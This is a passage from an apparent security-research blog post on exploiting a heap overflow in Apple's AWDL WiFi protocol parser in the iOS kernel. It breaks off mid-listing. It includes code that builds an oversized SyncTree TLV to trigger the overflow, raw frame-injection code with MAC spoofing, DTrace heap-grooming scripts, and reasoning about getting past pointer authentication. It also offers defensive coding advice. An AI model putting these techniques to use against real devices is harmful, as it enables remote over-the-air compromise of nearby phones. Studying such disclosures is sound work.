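Putting those header fields together, here's a sketch of filling out the 802.11 header for an AWDL action frame (using the ieee80211_hdr struct above; the 0x00d0 frame_control value is the standard little-endian encoding of a Management frame with the Action subtype, and the usual 6-byte ether_addr layout is assumed):


static const struct ether_addr awdl_bssid =
    {{0x00, 0x25, 0x00, 0xff, 0x94, 0x73}};

void fill_awdl_header(struct ieee80211_hdr *hdr,
                      const struct ether_addr *dst,
                      const struct ether_addr *src) {
  hdr->frame_control = 0x00d0;   // management frame, Action subtype
  hdr->duration_id   = 0;
  hdr->dst_addr      = *dst;     // broadcast, or a peer's AWDL MAC
  hdr->src_addr      = *src;     // our (spoofed) unicast source MAC
  hdr->bssid_addr    = awdl_bssid;
  hdr->seq_ctrl      = 0;
}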


The format of the bytes following the header depends on the frame type. For an Action frame the next byte is a category field. There are a large number of categories which allow devices to exchange all kinds of information. For example category 5 covers various types of radio measurements like noise histograms.


The special category value 0x7f defines this frame as a vendor-specific action frame meaning that the next three bytes are the OUI of the vendor responsible for this custom action frame format.


Apple owns the OUI 0x00 0x17 0xf2 and this is the OUI used for AWDL action frames. Every byte in the frame after this is now proprietary, defined by Apple rather than an IEEE standard.


The SEEMOO labs team have done a great job reversing the AWDL action frame format and they developed a wireshark dissector.


AWDL Action frames have a fixed-sized header followed by a variable length collection of TLVs:



The layout of fields in an AWDL frame: 802.11 header, action frame header, AWDL fixed header and variable length AWDL payload


Each TLV has a single-byte type followed by a two-byte length which is the length of the variable-sized payload in bytes.
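

In C that TLV layout looks something like this (a sketch based on the description above; the name matches the awdl_tlv type which appears in the decompilation later):


struct awdl_tlv {
  uint8_t  type;   // single-byte TLV type, e.g. 0x14 for SyncTree
  uint16_t len;    // two-byte length of val in bytes, little-endian, unaligned
  uint8_t  val[];  // variable-sized payload
} __attribute__((packed));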


There are two types of AWDL action frame: Master Indication Frames (MIF) and Periodic Synchronization Frames (PSF). They differ only in their type field and the collection of TLVs they contain.


An AWDL mesh network has a single master node decided by an election process. Each node broadcasts a MIF containing a master metric parameter; the node with the highest metric becomes the master node. It is this master node's PSF timing values which should be adopted as the true timing values for all the other nodes to synchronize to; in this way their availability windows can overlap and the network can have a higher throughput.

Frame processing

Back in 2017, Project Zero researcher Gal Beniamini published a seminal 5-part blog post series entitled Over The Air where he exploited a vulnerability in the Broadcom WiFi chipset to gain native code execution on the WiFi controller, then pivoted via an iOS kernel bug in the chipset-to-Application Processor interface to achieve arbitrary kernel memory read/write.


In that case, Gal targeted a vulnerability in the Broadcom firmware when it was parsing data structures related to TDLS. The raw form of these data structures was handled by the chipset firmware itself and never made it to the application processor.


In contrast, for AWDL the frames appear to be parsed in their entirety on the Application Processor by the kernel driver. Whilst this means we can explore a lot of the AWDL code, it also means that we're going to have to build the entire exploit on top of primitives we can build with the AWDL parser, and those primitives will have to be powerful enough to remotely compromise the device. Apple continues to ship new mitigations with each iOS release and hardware revision, and we're of course going to target the latest iPhone 11 Pro with the largest collection of these mitigations in place.


Can we really build something powerful enough to remotely defeat kernel pointer authentication just with a linear heap overflow in a WiFi frame parser? Defeating mitigations usually involves building up a library of tricks to help build more and more powerful primitives. You might start with a linear heap overflow and use it to build an arbitrary read, then use that to help build an arbitrary bit flip primitive and so on.


I've built a library of tricks and techniques like this for doing local privilege escalations on iOS but I'll have to start again from scratch for this brand new attack surface.

A brief tour of the AWDL codebase

The first two C++ classes to familiarize ourselves with are IO80211AWDLPeer and IO80211AWDLPeerManager. There's one IO80211AWDLPeer object for each AWDL peer which a device has recently received a frame from. A background timer destroys inactive IO80211AWDLPeer objects. There's a single instance of the IO80211AWDLPeerManager which is responsible for orchestrating interactions between this device and other peers.


Note that although we have some function names from the iOS 12 beta 1 kernelcache and the MacOS IO80211Family driver we don't have object layout information. Brandon Azad pointed out that the MacOS prelinked kernel image does contain some structure layout information in the __CTF.__ctf section which can be parsed by the dtrace ctfdump tool. Unfortunately this seems to only contain structures from the open source XNU code.


The sizes of OSObject-based IOKit objects can easily be determined statically but the names and types of individual fields cannot. One of the most time-consuming tasks of this whole project was the painstaking process of reverse engineering the types and meanings of a huge number of the fields in these objects. Each IO80211AWDLPeer object is almost 6KB; that's a lot of potential fields. Having structure layout information would probably have saved months.


If you're a defender building a threat model don't interpret this the wrong way: I would assume any competent real-world exploit development team has this information; either from images or devices with full debug symbols they have acquired with or without Apple's consent, insider access, or even just from monitoring every single firmware image ever publicly released to check whether debug symbols were released by accident. Larger groups could even have people dedicated to building custom reversing tools.


Six years ago I had hoped Project Zero would be able to get legitimate access to data sources like this. Six years later and I am still spending months reversing structure layouts and naming variables.


We'll take IO80211AWDLPeerManager::actionFrameInput as the point where untrusted raw AWDL frame data starts being parsed. There is actually a separate, earlier processing layer in the WiFi chipset driver but its parsing is minimal.


Each frame received while the device is listening on a social channel which was sent to the AWDL BSSID ends up at actionFrameInput, wrapped in an mbuf structure. Mbufs are an anachronistic data structure used for wrapping collections of networking buffers. The mbuf API is the stuff of nightmares, but that's not in scope for this blogpost.


The mbuf buffers are concatenated to get a contiguous frame in memory for parsing, then IO80211PeerManager::findPeer is called, passing the source MAC address from the received frame:


IO80211AWDLPeer*

IO80211PeerManager::findPeer(struct ether_addr *peer_mac)


If an AWDL frame has recently been received from this source MAC then this function returns a pointer to an existing IO80211AWDLPeer structure representing the peer with that MAC. The IO80211AWDLPeerManager uses a fairly complicated priority queue data structure called IO80211CommandQueue to store pointers to these currently active peers.


If the peer isn't found in the IO80211AWDLPeerManager's queue of peers then a new IO80211AWDLPeer object is allocated to represent this new peer and it's inserted into the IO80211AWDLPeerManager's peers queue.


Once a suitable peer object has been found the IO80211AWDLPeerManager then calls the actionFrameReport method on the IO80211AWDLPeer so that it can handle the action frame.


This method is responsible for most of the AWDL action frame handling and contains most of the untrusted parsing. It first updates some timestamps then reads various fields from TLVs in the frame using the IO80211AWDLPeerManager::getTlvPtrForType method to extract them directly from the mbuf. After this initial parsing comes the main loop which takes each TLV in turn and parses it.


First each TLV is passed to IO80211AWDLPeer::tlvCheckBounds. This method has a hardcoded list of specific minimum and maximum TLV lengths for some of the supported TLV types. For types not explicitly listed it enforces a maximum length of 1024 bytes. I mentioned earlier that I often encounter code constructs which look like shallow memory corruption only to later discover a bounds check far away. This is exactly that kind of construct, and is in fact where Apple added a bounds check in the patch.


Type 0x14 (which has the vulnerability in the parser) isn't explicitly listed in tlvCheckBounds so it gets the default upper length limit of 1024, significantly larger than the 60 byte buffer allocated for the destination buffer in the IO80211AWDLPeer structure.


This pattern of separating bounds checks away from parsing code is fragile; it's too easy to forget or not realize that when adding code for a new TLV type it's also a requirement to update the tlvCheckBounds function. If this pattern is used, try to come up with a way to enforce that new code must explicitly declare an upper bound here. One option could be to ensure an enum is used for the type and wrap the tlvCheckBounds method in a pragma to temporarily enable clang's -Wswitch-enum warning as an error:


#pragma clang diagnostic push

#pragma clang diagnostic error "-Wswitch-enum"

 

IO80211AWDLPeer::tlvCheckBounds(...) {

  switch(tlv->type) {

    case type_a:

      ...;

    case type_b:

      ...;

  }
}

 

#pragma clang diagnostic pop


This causes a compilation error if the switch statement doesn't have an explicit case statement for every value of the tlv->type enum.


Static analysis tools like Semmle can also help here. The EnumSwitch class can be used, as in this example code, to check whether all enum values are explicitly handled.


If the tlvCheckBounds checks pass then there is a switch statement with a case to parse each supported TLV:


Type

Handler

0x02

IO80211AWDLPeer::processServiceResponseTLV

0x04

IO80211AWDLPeer::parseAwdlSyncParamsTlvAndTakeAction

0x05

IO80211AWDLPeer::parseAwdlElectionParamsV1

0x06

inline parsing of serviceParam

0x07

IO80211Peer::parseHTCapTLV

0x0c

nop

0x10

inline parsing of ARPA

0x11

IO80211Peer::parseVhtCapTLV

0x12

IO80211AWDLPeer::parseAwdlChanSeqFromChanSeqTLV

0x14

IO80211AWDLPeer::parseAwdlSyncTreeTLV

0x15

inline parser extracting 2 bytes

0x16

IO80211AWDLPeer::parseBloomFilterTlv

0x17

inlined parser of NSync

0x1d

IO80211AWDLPeer::parseBssSteeringTlv

SyncTree vulnerability in context

Here's a cleaned up decompilation of the relevant portions of the parseAwdlSyncTreeTLV method which contains the vulnerability:


int

IO80211AWDLPeer::parseAwdlSyncTreeTLV(awdl_tlv* tlv)

{

  u64 new_sync_tree_size;

 

  u32 old_sync_tree_size = this->n_sync_tree_macs + 1;

  if (old_sync_tree_size >= 10 ) {

    old_sync_tree_size = 10;

  }

 

  if (old_sync_tree_size == tlv->len/6 ) {

    new_sync_tree_size = old_sync_tree_size;

  } else {

    new_sync_tree_size = tlv->len/6;

    this->n_sync_tree_macs = new_sync_tree_size;

  }

 

  memcpy(this->sync_tree_macs, &tlv->val[0], 6 * new_sync_tree_size);

 

...


sync_tree_macs is a 60-byte inline array in the IO80211AWDLPeer structure, at offset +0x1648. That's enough space to store 10 MAC addresses. The IO80211AWDLPeer object is 0x16a8 bytes in size which means it will be allocated in the kalloc.6144 zone.


tlvCheckBounds will enforce a maximum value of 1024 for the length of the SyncTree TLV. The TLV parser will round that value down to the nearest multiple of 6 and copy that number of bytes into the sync_tree_macs array at +0x1648. This will be our memory corruption primitive: a linear heap buffer overflow in 6-byte chunks which can corrupt all the fields in the IO80211AWDLPeer object past +0x1684 and then a few hundred bytes off the end of the kalloc.6144 zone chunk. We can easily cause IO80211AWDLPeer objects to be allocated next to each other by sending AWDL frames from a large number of different spoofed source MAC addresses in quick succession. This gives us four rough primitives to think about as we start to find a path to exploitation:


1) Corrupting fields after the sync_tree_macs array in the IO80211AWDLPeer object:

Overflowing into the fields at the end of the peer object


2) Corrupting the lower fields of an IO80211AWDLPeer object groomed next to this one:


Overflowing into the fields at the start of a peer object next to this one


3) Corrupting the lower bytes of another object type we can groom to follow a peer in kalloc.6144:


Overflowing into a different type of object next to this peer in the same zone


4) Meta-grooming the zone allocator to place a peer object at a zone boundary so we can corrupt the early bytes of an object from another zone:



Overflowing into a different type of object in a different zone


We'll revisit these options in greater detail soon.
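

Before moving on, here's a concrete sketch of what the attacker-controlled TLV itself looks like (using the awdl_tlv layout from earlier; the helper name is illustrative, not code from the exploit):


#include <stdint.h>
#include <string.h>

// Build a SyncTree TLV (type 0x14) whose payload is longer than the
// 60-byte sync_tree_macs destination buffer. tlvCheckBounds allows up
// to 1024 bytes for this type; the parser then copies
// 6 * (payload_len / 6) bytes into the peer object at +0x1648,
// overflowing it once payload_len > 60.
size_t build_synctree_overflow(uint8_t *out,
                               const uint8_t *payload,
                               uint16_t payload_len) {
  out[0] = 0x14;                 // SyncTree TLV type
  out[1] = payload_len & 0xff;   // little-endian 16-bit length
  out[2] = payload_len >> 8;
  memcpy(&out[3], payload, payload_len);
  return 3 + payload_len;
}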

Getting on the air

At this point we understand enough about the AWDL frame format to start trying to get controlled, arbitrary data going over the air and reach the frame parsing entrypoint.


I tried for a long time to get the open source academic OWL project to build and run successfully, sadly without success. In order to start making progress I decided to write my own AWDL client from scratch. Another approach could have been to write a MacOS kernel module to interact with the existing AWDL driver, which may have simplified some aspects of the exploit but also made others much harder.


I started off using an old Netgear WG111v2 WiFi adapter I've had for many years which I knew could do monitor mode and frame injection, albeit only on 2.4 GHz channels. It uses an rtl8187 chipset. Since I wanted to use the linux drivers for these adapters I bought a Raspberry Pi 4B to run the exploit.


In the past I've used Scapy for crafting network packets from scratch. Scapy can craft and inject arbitrary 802.11 frames, but since we're going to need a lot of control over injection timing it might not be the best tool. Scapy uses libpcap to interact with the hardware to inject raw frames so I took a look at libpcap. Some googling later I found this excellent tutorial example which demonstrates exactly how to use libpcap to inject a raw 802.11 frame. Let's dissect exactly what's required:

Radiotap

We've seen the structure of the data in 802.11 AWDL frames; there will be an ieee80211 header at the start, an Apple OUI, then the AWDL action frame header and so on. If our WiFi adaptor were connected to a WiFi network, this might be enough information to transmit such a frame. The problem is that we're not connected to any network. This means we need to attach some metadata to our frame to tell the WiFi adaptor exactly how it should get this frame on to the air. For example, what channel and with what bandwidth and modulation scheme should it use to inject the frame? Should it attempt re-transmits until an ACK is received? What signal strength should it use to inject the frame?


Radiotap is a standard for expressing exactly this type of frame metadata, both when injecting frames and receiving them. It's a slightly fiddly variable-sized header which you can prepend on the front of a frame to be injected (or read off the start of a frame which you've sniffed.)


Whether the radiotap fields you specify are actually respected and used depends on the driver you are using - a driver may choose to simply not allow userspace to specify many aspects of injected frames. Here's an example radiotap header captured from an AWDL frame using the built-in MacOS packet sniffer on a MacBook Pro. Wireshark has parsed the binary radiotap format for us:



Wireshark parses radiotap headers in pcaps and shows them in a human-readable form


From this radiotap header we can see a timestamp, the data rate used for transmission, the channel (5.220 GHz which is channel 44) and the modulation scheme (OFDM). We can also see an indication of the strength of the received signal and a measure of the noise.


The tutorial gave the following radiotap header:


static uint8_t u8aRadiotapHeader[] = {

  0x00, 0x00, // version

  0x18, 0x00, // size

  0x0f, 0x80, 0x00, 0x00, // included fields

  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, //timestamp

  0x10, // add FCS

  0x00,// rate

  0x00, 0x00, 0x00, 0x00, // channel

  0x08, 0x00, // NOACK; don't retry

};


With knowledge of radiotap and a basic header it's not too tricky to get an AWDL frame on to the air using the pcap_inject interface and a wireless adaptor in monitor mode:


int pcap_inject(pcap_t *p, const void *buf, size_t size)
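

A minimal sketch of that injection path (standard libpcap calls; u8aRadiotapHeader is the header shown above, and the interface is assumed to already be in monitor mode):


#include <pcap/pcap.h>
#include <stdint.h>
#include <string.h>

// Prepend the radiotap header to a raw 802.11 frame and inject it.
int inject_frame(const char *ifname, const uint8_t *frame, size_t frame_len) {
  char errbuf[PCAP_ERRBUF_SIZE];
  pcap_t *p = pcap_open_live(ifname, 256, 0, 1, errbuf);
  if (!p) return -1;

  uint8_t buf[4096];
  memcpy(buf, u8aRadiotapHeader, sizeof(u8aRadiotapHeader));
  memcpy(buf + sizeof(u8aRadiotapHeader), frame, frame_len);

  int ret = pcap_inject(p, buf, sizeof(u8aRadiotapHeader) + frame_len);
  pcap_close(p);
  return ret;
}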


Of course, this doesn't immediately work and with some trial and error it seems that the rate and channel fields aren't being respected. Injection with this adaptor seems to only work at 1Mbps, and the channel specified in the radiotap header won't be the one used for injection. This isn't such a problem as we can still easily set the WiFi adaptor channel manually:


iw dev wlan0 set channel 6


Injection at 1Mbps is exceptionally slow but this is enough to get a test AWDL frame on to the air and we can see it in Wireshark on another device in monitor mode. But nothing seems to be happening on a target device. Time for some debugging!

Debugging with DTrace

The SEEMOO labs paper had already suggested setting some MacOS boot arguments to enable more verbose logging from the AWDL kernel driver. These log messages were incredibly helpful but often you want more information than you can get from the logs.


For the initial report PoC I showed how to use the MacOS kernel debugger to modify an AWDL frame which was about to be transmitted. Typically, in my experience, the MacOS kernel debugger is exceptionally unwieldy and unreliable. Whilst you can technically script it using lldb's python bindings, I wouldn't recommend it.


Apple does have one trick up their sleeve however; DTrace! Where the MacOS kernel debugger is awful in my opinion, DTrace is exceptional. DTrace is a dynamic tracing framework originally developed by Sun Microsystems for Solaris. It's been ported to many platforms including MacOS and ships by default. It's the magic behind tools such as Instruments. DTrace allows you to hook in little snippets of tracing code almost wherever you want, both in userspace programs, and, amazingly, the kernel. DTrace has its quirks. Hooks are written in the D language which doesn't have loops and the scoping of variables takes a little while to get your head around, but it's the ultimate debugging and reversing tool.


For example, I used this DTrace script on MacOS to log whenever a new IO80211AWDLPeer object was allocated, printing its heap address and MAC address:


self char* mac;

 

fbt:com.apple.iokit.IO80211Family:_ZN15IO80211AWDLPeer21withAddressAndManagerEPKhP22IO80211AWDLPeerManager:entry {

  self->mac = (char*)arg0;

}

 

fbt:com.apple.iokit.IO80211Family:_ZN15IO80211AWDLPeer21withAddressAndManagerEPKhP22IO80211AWDLPeerManager:return {

  printf("new AWDL peer: %02x:%02x:%02x:%02x:%02x:%02x allocation:%p", self->mac[0], self->mac[1], self->mac[2], self->mac[3], self->mac[4], self->mac[5], arg1); 

}


Here we're creating two hooks, one which runs at a function entry point and the other which runs just before that same function returns. We can use the self-> syntax to pass variables between the entry point and return point and DTrace makes sure that the entries and returns match up properly.


We have to use the mangled C++ symbol in dtrace scripts; using c++filt we can see the demangled version:


$ c++filt -n _ZN15IO80211AWDLPeer21withAddressAndManagerEPKhP22IO80211AWDLPeerManager

IO80211AWDLPeer::withAddressAndManager(unsigned char const*, IO80211AWDLPeerManager*)


The entry hook "saves" the pointer to the MAC address which is passed as the first argument; associating it with the current thread and stack frame. The return hook then prints out that MAC address along with the return value of the function (arg1 in a return hook is the function's return value) which in this case is the address of the newly-allocated IO80211AWDLPeer object.


With DTrace you can easily prototype custom heap logging tools. For example if you're targeting a particular allocation size and wish to know what other objects are ending up in there you could use something like the following DTrace script:


/* some globals with values */

BEGIN {

  target_size_min = 97;

  target_size_max = 128;

}

 

fbt:mach_kernel:kalloc_canblock:entry {

  self->size = *(uint64_t*)arg0;

}

 

fbt:mach_kernel:kalloc_canblock:return

/self->size >= target_size_min &&

 self->size <= target_size_max   /

{

  printf("target allocation %x =  %x", self->size, arg1);

  stack();

}


The expression between the two /'s allows the hook to be conditionally executed. In this case limiting it to cases where kalloc_canblock has been called with a size between target_size_min and target_size_max. The built-in stack() function will print a stack trace, giving you some insight into the allocations within a particular size range. You could also use ustack() to continue that stack trace in userspace if this kernel allocation happened due to a syscall for example.


DTrace can also safely dereference invalid addresses without kernel panicking, making it very useful for prototyping and debugging heap grooms. With some ingenuity it's also possible to do things like dump linked-lists and monitor for the destruction of particular objects.


I'd really recommend spending some time learning DTrace; once you get your head around its esoteric programming model you'll find it an immensely powerful tool.

Reaching the entrypoint

Using DTrace to log stack frames I was able to trace the path legitimate AWDL frames took through the code and determine how far my fake AWDL frames made it. Through this process I discovered that there are, at least on MacOS, two AWDL parsers in the kernel: the main one we've already seen inside the IO80211Family kext and a second, much simpler one in the driver for the particular chipset being used. There were three checks in this simpler parser which I was failing, each of which meant my fake AWDL frames never made it to the IO80211Family code:


Firstly, the source MAC address was being validated. MAC addresses actually contain multiple fields: 

The first half of a MAC address is an OUI. The least significant bit of the first byte defines whether the address is multicast or unicast. The second bit defines whether the address is locally administered or globally unique. 


Diagram used under CC BY-SA 2.5 By Inductiveload, modified/corrected by Kju - SVG drawing based on PNG uploaded by User:Vtraveller. This can be found on Wikipedia here


The source MAC address 01:23:45:67:89:ab from the libpcap example was an unfortunate choice as it has the multicast bit set. AWDL only wants to deal with unicast addresses and rejects frames from multicast addresses. Choosing a new MAC address to spoof without that bit set solved this problem.
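

In code the constraint is just the low bit of the first byte (a sketch of the check, not the driver's actual code):


#include <stdint.h>

// The least significant bit of the first byte of a MAC address is the
// multicast/unicast flag; AWDL rejects frames from multicast sources.
int is_unicast(const uint8_t mac[6]) {
  return (mac[0] & 0x01) == 0;
}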


The next check was that the first two TLVs in the variable-length payload section of the frame must be a type 4 (sync parameters) then a type 6 (service parameters.)


Finally the channel number in the sync parameters had to match the channel on which the frame had actually been received.


With those three issues fixed I was finally able to get arbitrary controlled bytes to appear at the actionFrameReport method on a remote device and the next stage of the project could begin.

A framework for an AWDL client

We've seen that AWDL uses time division multiplexing to quickly switch between the channels used for AWDL (typically 6 and 44) and the channel used by the access point the device is connected to. By parsing the AWDL synchronization parameters TLV in the PSF and MIF frames sent by AWDL peers you can calculate when they will be listening in the future. The OWL project uses the linux libev library to try to only transmit at the right moment when other peers will be listening.


There are a few problems with this approach for our purposes:


Firstly, and very importantly, this makes targeting difficult. AWDL action frames are (usually) sent to a broadcast destination MAC address (ff:ff:ff:ff:ff:ff.) It's a mesh network and these frames are meant to be used by all the peers for building up the mesh.


Whilst exploiting every listening AWDL device in proximity at the same time would be an interesting research problem and make for a cool demo video, it also presents many challenges far outside the initial scope. I really needed a way to ensure that only devices I controlled would process the AWDL frames I sent.


With some experimentation it turned out that all AWDL frames can also be sent to unicast addresses and devices would still parse them. This presents another challenge as the AWDL virtual interface's MAC address is randomly generated each time the interface is activated. For testing on MacOS it suffices to run:


ifconfig awdl0


to determine the current MAC address. For iOS it's a little more involved; my chosen technique has been to sniff on the AWDL social channels and correlate signal strength with movements of the device to determine its current AWDL MAC.


There's one other important difference when you send an AWDL action frame to a unicast address: if the device is currently listening on that channel and receives the frame, it will send an ACK. This turns out to be extremely helpful. We will end up building some quite complex primitives using AWDL action frames, abusing the protocol to build a weird machine. Being able to tell whether a target device really received a frame or not means we can treat AWDL frames more like a reliable transport medium. For the typical usage of AWDL this isn't necessary; but our usage of AWDL is not going to be typical.


This ACK-sniffing model will be the building block for our AWDL frame injection API.

Acktually receiving ACKs

Just because the ACKs are coming over the air now doesn't mean we actually see them. Although the WiFi adaptor we're using for injection must be technically capable of receiving ACKs (as they are a fundamental protocol building block), being able to see them on the monitor interface isn't guaranteed.


A screenshot of wireshark showing a spoofed AWDL frame followed by an Acknowledgement from the target device.


The libpcap interface is quite generic and doesn't have any way to indicate that a frame was ACKed or not. It might not even be the case that the kernel driver is aware whether an ACK was received. I didn't really want to delve into the injection interface kernel drivers or firmware as that was liable to be a major investment in itself so I tried some other ideas.


ACK frames in 802.11g and 802.11a are timing based. There's a short window after each transmitted frame when the receiver can ACK if they received the frame. It's for this reason that ACK frames don't contain a source MAC address. It's not necessary as the ACK is already perfectly correlated with a source device due to the timing.


If we also listen on our injection interface in monitor mode we might be able to receive the ACK frames ourself and correlate them. As mentioned, not all chipsets and drivers actually give you all the management frames.

 

For my early prototypes, I managed to find a pair in my box of WiFi adaptors where one would successfully inject on 2.4 GHz channels at 1Mbps and the other would successfully sniff ACKs on that channel at 1Mbps.


1Mbps is exceptionally slow; a relatively large AWDL frame ends up being on the air for 10ms or more at that speed, so if your availability window is only a few ms you're not going to get many frames per second. Still, this was enough to get going.


The injection framework I built for the exploit uses two threads, one for frame injection and one for ACK sniffing. Frames are injected using the try_inject function, which extracts the spoofed source MAC address and signals to the second sniffing thread to start looking for an ACK frame being sent to that MAC.


Using a pthread condition variable, the injecting thread can then wait for a limited amount of time during which the sniffing thread may or may not see the ACK. If the sniffing thread does see the ACK it can record this fact then signal the condition variable. The injection thread will stop waiting and can check whether the ACK was received.


Take a look at try_inject_internal in the exploit for the mutex and condition variable setup code for this.
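

The heart of that handshake is a standard timed condition-variable wait; here's a simplified sketch (names and structure assumed, not the exploit's exact code):


#include <pthread.h>
#include <stdbool.h>
#include <time.h>

static pthread_mutex_t ack_lock = PTHREAD_MUTEX_INITIALIZER;
static pthread_cond_t ack_cond = PTHREAD_COND_INITIALIZER;
static bool ack_seen = false;

// called by the sniffing thread when it sees an ACK sent to our spoofed MAC
void ack_sniffed(void) {
  pthread_mutex_lock(&ack_lock);
  ack_seen = true;
  pthread_cond_signal(&ack_cond);
  pthread_mutex_unlock(&ack_lock);
}

// called by the injecting thread after transmitting; returns whether the
// ACK arrived before the timeout
bool wait_for_ack(int timeout_ms) {
  struct timespec deadline;
  clock_gettime(CLOCK_REALTIME, &deadline);
  deadline.tv_sec += timeout_ms / 1000;
  deadline.tv_nsec += (timeout_ms % 1000) * 1000000L;
  if (deadline.tv_nsec >= 1000000000L) {
    deadline.tv_sec += 1;
    deadline.tv_nsec -= 1000000000L;
  }

  pthread_mutex_lock(&ack_lock);
  while (!ack_seen &&
         pthread_cond_timedwait(&ack_cond, &ack_lock, &deadline) == 0) {
    // loop to guard against spurious wakeups
  }
  bool got_ack = ack_seen;
  ack_seen = false;
  pthread_mutex_unlock(&ack_lock);
  return got_ack;
}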


There's a wrapper around try_inject called inject which repeatedly calls try_inject until it succeeds. These two methods allow us to do all the timing sensitive and insensitive frame injection we need.


These two methods take a variable number of pkt_buf_t pointers; a simple custom variable-sized buffer wrapper object. The advantage of this approach is that it allows us to quickly prototype new AWDL frame structures without having to write boilerplate code. For example, this is all the code required to inject a basic AWDL frame and re-transmit it until the target receives it:


inject(RT(),

       WIFI(dst, src),

       AWDL(),

       SYNC_PARAMS(),

       SERV_PARAM(),

       PKT_END());


Investing a little bit of time building this API saved a lot of time in the long run and made it very easy to experiment with new ideas.


With an injection framework finally up and running we can start to think about how to actually exploit this vulnerability!

The new challenges on A12/A13

The Apple A12 SOC found in the iPhone Xr/Xs contained the first commercially-available ARM CPU implementing the ARMv8.3 optional Pointer Authentication feature. This was released in September 2018. This post from Project Zero researcher Brandon Azad covers PAC and its implementation by Apple in great detail, as does this presentation from the 2019 LLVM developers meeting.


Its primary use is as a form of Control Flow Integrity. In theory all function pointers present in memory should contain a Pointer Authentication Code in their upper bits which will be verified after the pointer is loaded from memory but before it's used to modify control flow.


In almost all cases this PAC instrumentation will be added by the compiler. There's a really great document from the clang team which goes into great detail about the implementation of PAC from a compiler point of view and the security tradeoffs involved. It has a brilliant section on the threat model of PAC which frankly and honestly discusses the cases where PAC may help and the cases where it won't. Documentation like this should ship with every mitigation.


Having a publicly documented threat model helps everyone understand the intentions behind design decisions and the tradeoffs which were necessary. It helps build a common vocabulary and helps to move discussions about mitigations away from a focus on security through obscurity towards a qualitative appraisal of their strengths and weaknesses.


Concretely, the first hurdle PAC will throw up is that it will make it harder to forge vtable pointers.


All OSObject-derived objects have virtual methods. IO80211AWDLPeer, like almost all IOKit C++ classes, derives from OSObject, so the first field is a vtable pointer. As we saw in the heap-grooming sketches earlier, by spraying IO80211AWDLPeer objects then triggering the heap overflow we can easily gain control of a vtable pointer. This technique was used in Mateusz Jurczyk's Samsung MMS remote exploit and Natalie Silvanovich's remote WebRTC exploit this year.


Kernel virtual calls have gone from looking like this on A11 and below:


LDR   X8, [X20]      ; load vtable pointer

LDR   X8, [X8,#0x38] ; load function pointer from vtable

MOV   X0, X20

BLR   X8             ; call virtual function


to this on A12 and above:


LDR   X8, [X20]           ; load vtable pointer

 

; authenticate vtable pointer using A-family data key and zero context

; if authentication passes, add 0x38 to vtable pointer, load value

; at that address into X9 and store X8+0x38 back to X8 without a PAC

LDRAA X9, [X8,#0x38]!

 

; overwrite the upper 16 bits of X8 with the constant 0xFFFC

; this is a hash of the mangled symbol; constant at each callsite

MOVK  X8, #0xFFFC,LSL#48

MOV   X0, X20

 

; authenticate virtual function pointer with A-family instruction key

; and context value where the upper 16 bits are a hash of the

; virtual function prototype and the lower 48 bits are the runtime

; address of the virtual function pointer in the vtable

BLRAA X9, X8


Diagrammatic view of a C++ virtual call in ARM64e showing the keys and discriminators used


What does that mean in practice?


If we don't have a signing gadget, then we can't trivially point a vtable pointer to an arbitrary address. Even if we could, we'd need a data and instruction family signing gadget with control over the discriminator.


We can swap a vtable pointer with any other A-family 0-context data key signed pointer, however the virtual function pointer itself is signed with a context value consisting of the address of the vtable entry and a hash of the virtual function prototype. This means we can't swap virtual function pointers from one vtable into another one (or more likely into a fake vtable to which we're able to get an A-family data key signed pointer.)


We can swap one vtable pointer for another one to cause a type confusion, however every virtual function call made through that vtable pointer would have to be calling a function with a matching prototype hash. This isn't so improbable; a fundamental building block of object-oriented programming in C++ is to call functions with matching prototypes but different behaviour via a vtable. Nevertheless you'd have to do some thinking to come up with a generic defeat using this approach.


An important observation is that the vtable pointers themselves have no address diversity; they're signed with a zero-context. This means that if we can disclose a signed vtable pointer for an object of type A at address X, we can overwrite the vtable pointer for another object of type A at a different address Y.


This might seem completely trivial and uninteresting but remember: we only have a linear heap buffer overflow. If the vtable pointer had address diversity then for us to be able to safely corrupt fields after the vtable in an adjacent object we'd have to first disclose the exact vtable pointer following the object which we can overflow out of. Instead we can disclose any vtable pointer for this type and it will be valid.


The clang design doc explains why this is:


It is also known that some code in practice copies objects containing v-tables with memcpy, and while this is not permitted formally, it is something that may be invasive to eliminate.


Right at the end of this document they also say "attackers can be devious." On A12 and above we can no longer trivially point the vtable pointer to a fake vtable and gain arbitrary PC control fairly easily. Guess we'll have to get devious :)

Some initial ideas

Initially I continued using the iOS 12 beta 1 kernelcache when searching for exploitation primitives and performing the initial reversing to better understand the layout of the IO80211AWDLPeer object. This turned out to be a major mistake and a few weeks were spent following unproductive leads:


In the iOS 12 beta 1 kernelcache the fields following the sync_tree_macs buffer seemed uninteresting, at least from the perspective of being able to build a stronger primitive from the linear overflow. For this reason my initial ideas looked at corrupting the fields at the beginning of an IO80211AWDLPeer object which I could place subsequently in memory, option 2 which we saw earlier:


Spoofing many source MAC addresses makes allocating neighbouring IO80211AWDLPeer objects fairly easy. The synctree buffer overflow then allows corrupting the lower fields of an IO80211AWDLPeer in addition to the upper fields


Almost certainly we're going to need some kind of memory disclosure primitive to land this exploit. My first ideas for building a memory disclosure primitive involved corrupting the linked-list of peers. The data structure holding the peers is in fact much more complex than a linked list; it's more like a priority queue with some interesting behaviours when the queue is modified, and a distinct lack of safe unlinking and the like. I'd expect iOS to start slowly migrating to using data-PAC for linked-list integrity, but for now this isn't the case. In fact these linked lists don't even have the most basic safe-unlinking integrity checks yet.


The start of an IO80211AWDLPeer object looks like this:



All IOKit objects inheriting from OSObject have a vtable and a reference count as their first two fields. In an IO80211AWDLPeer these are followed by a hash_bucket identifier, a peer_list flink and blink, the peer's MAC address and the peer's peer_manager pointer.


My first ideas revolved around trying to partially corrupt a peer linked-list pointer. In hindsight, there's an obvious reason why this doesn't work (which I'll discuss in a bit), but let's remain enthusiastic and continue on for now...


Looking through the places where the linked list of peers seemed to be used it looked like perhaps the IO80211AWDLPeerManager::updatePeerListBloomFilter method might be interesting from the perspective of trying to get data leaked back to us. Let's take a look at it:


IO80211AWDLPeerManager::updatePeerListBloomFilter(){

  int n_peers = this->peers_list.n_elems;

 

  if (!this->peer_bloom_filters_enabled) {

    return 0;

  }

 

  bzero(this->bloom_filter_buf, 0xA00uLL);

  this->n_macs_in_bloom_filter = 0;

 

  IO80211AWDLPeer* peer = this->peers_list.head;

 

  int n_peers_in_filter = 0;

  for (;

       n_peers_in_filter < n_peers && n_peers_in_filter < 0x100;

       n_peers_in_filter++) {

